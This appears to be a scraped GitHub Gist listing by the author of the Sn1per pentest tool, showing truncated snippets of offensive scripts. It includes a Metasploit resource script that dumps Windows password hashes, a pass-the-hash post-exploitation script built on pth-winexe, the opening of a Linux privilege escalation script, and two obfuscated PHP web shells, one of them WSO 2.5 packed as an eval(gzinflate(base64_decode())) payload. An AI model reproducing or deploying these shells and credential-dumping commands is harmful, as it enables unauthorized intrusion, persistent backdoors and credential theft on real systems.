xer0dayz 1N3
1N3
/ Sn1per v4.4 (Beta)
Created
March 21, 2018 00:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # + -- --=[Sn1per by 1N3@CrowdShield | |
| # + -- --=[http://crowdshield.com | |
| # | |
| VER="4.4" | |
| BROWSER="firefox" # SET DEFAULT BROWSER | |
| INSTALL_DIR="/usr/share/sniper" | |
| PLUGINS_DIR="/usr/share/sniper/plugins" | |
| CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # crt.sh sub-domain check by 1N3@CrowdShield | |
| # https://crowdshield.com | |
| # | |
| OKBLUE='\033[94m' | |
| OKRED='\033[91m' | |
| OKGREEN='\033[92m' | |
| OKORANGE='\033[93m' |
1N3
/ LinuxPrivEsc.sh
Created
May 13, 2016 02:50
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # `7MN. `7MF' | |
| # __, MMN. M | |
| #`7MM M YMb M pd""b. | |
| # MM M `MN. M (O) `8b | |
| # MM M `MM.M ,89 | |
| # MM M YMM ""Yb. | |
| #.JMML..JML. YM 88 | |
| # (O) .M' |
1N3
/ metasploit-post-exploitation-script-for-windows.rc
Created
February 3, 2016 12:22
Metasploit Post Exploitation Script For Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setg SESSION 1 | |
| use post/windows/gather/smart_hashdump | |
| run | |
| use post/windows/gather/credentials/domain_hashdump | |
| run | |
| use post/windows/gather/credentials/mcafee_vse_hashdump | |
| run | |
| use post/windows/gather/credentials/mssql_local_hashdump | |
| run | |
| use post/windows/gather/hashdump |
1N3
/ windows-post-exploitation.sh
Created
February 3, 2016 12:18
A Windows post exploitation shell script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| TARGET=$1 | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ____ | |
| _________ / _/___ ___ _____ | |
| / ___/ __ \ / // __ \/ _ \/ ___/ | |
| (__ ) / / // // /_/ / __/ / | |
| /____/_/ /_/___/ .___/\___/_/ | |
| /_/ | |
| + -- --=[http://crowdshield.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @fileoverview This file loads a bunch of HSTS domains and times how long it | |
| * takes for them to be redirected from HTTP to HTTPS. Based on that, it | |
| * decides whether the domain is a previously-noted HSTS domain or not. | |
| * @author yan <[email protected]> | |
| * @license MIT | |
| * @version 0.2.0 | |
| */ | |
| // Timing in milliseconds above which a network request probably occurred. |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ____ | |
| _________ / _/___ ___ _____ | |
| / ___/ __ \ / // __ \/ _ \/ ___/ | |
| (__ ) / / // // /_/ / __/ / | |
| /____/_/ /_/___/ .___/\___/_/ | |
| /_/ | |
| + -- --=[http://crowdshield.com | |
| + -- --=[sn1per v1.3 by 1N3 |
1N3
/ preg_replace_WSO_2.5.php
Last active
October 28, 2018 22:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This was done by taking the preg_replace() function and creating a new PHP file with the function and arguments and analyzing the results... | |
| <?php | |
| echo preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPU |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ'])) | |
| { | |
| $a1="Fil"; | |
| $c1="#d"; | |
| $c2="f5"; | |
| $color = $c1.$c2; | |
| $bs="esM"; | |
| $da="an"; | |
| $default_action = $a1.$bs.$da; |
NewerOlder